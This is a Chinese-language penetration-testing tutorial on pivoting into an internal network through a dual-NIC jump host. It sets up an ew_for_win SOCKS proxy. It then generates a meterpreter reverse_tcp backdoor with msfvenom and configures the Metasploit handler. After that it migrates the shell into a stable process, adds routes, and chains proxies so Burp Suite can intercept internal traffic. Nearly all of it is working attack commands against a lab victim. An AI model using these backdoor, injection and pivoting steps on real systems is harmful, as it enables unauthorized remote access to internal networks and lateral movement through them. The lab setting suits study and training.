一、使用代理工具 ew_for_win
1、环境准备:
(1)一台双网卡虚拟机(作为跳板),能同时与攻击者主机和受害者主机通信:
(2)一台攻击者主机:

(3)一台受害者者主机:

2、通过文件上传,在跳板机上安装 ew_for_win.exe
(1)在跳板机上:
执行命令:
ew_for_Win.exe -s ssocksd -l 1080
(2)在攻击主机上:
用 burpsuite 设置 socks 代理:
(3)在攻击者主机上访问受害者主机,访问成功
二、burpsuite 设置上游代理访问内网:
1、环境准备:
(1)kali

(2)其余和上面提到的一致
2、使用 msfvenom 生成后门:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.103.130 lport=4455 -f exe > r.exe
3、把后门放到跳板机上:
4、设置 msf 监听模块:
- msfconsole
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- set lhost 192.168.103.130
- set lport 4455
- exploit
5、跳板机运行 r.exe
6、进行进程迁移(注入):
因为获取到的 shell 的进程很脆弱,所以一般要和一些稳定的进程进行捆绑运行:
migrate 2348
6、获取到 meterpreter shell,然后设置路由:
run autoroute -s 169.254.0.0/16
7、使用socks_proxy模块:
- background
- use auxiliary/server/socks_proxy
- set version 4a
- exploit
8、在攻击者主机上设置代理为 kali 的 ip,auxiliary/server/socks_proxy 模块默认的端口是 1080,这个时候已经可以从攻击者主机访问到受害者主机了,但是因为使用了 192.168.103.130:1080 作为代理,就无法使用 Burpsuite 进行截包调试了
9、这时候可以使用代理工具 sockscap64 ,设置好代理后打开浏览器,这时候就相当于电脑设置了全局的代理
10、打开 burpsuite 在顶级代理服务器中中添加代理规则,目标host为 *,代理主机为 127.0.0.1,端口为 25378,此时就可以正常抓包了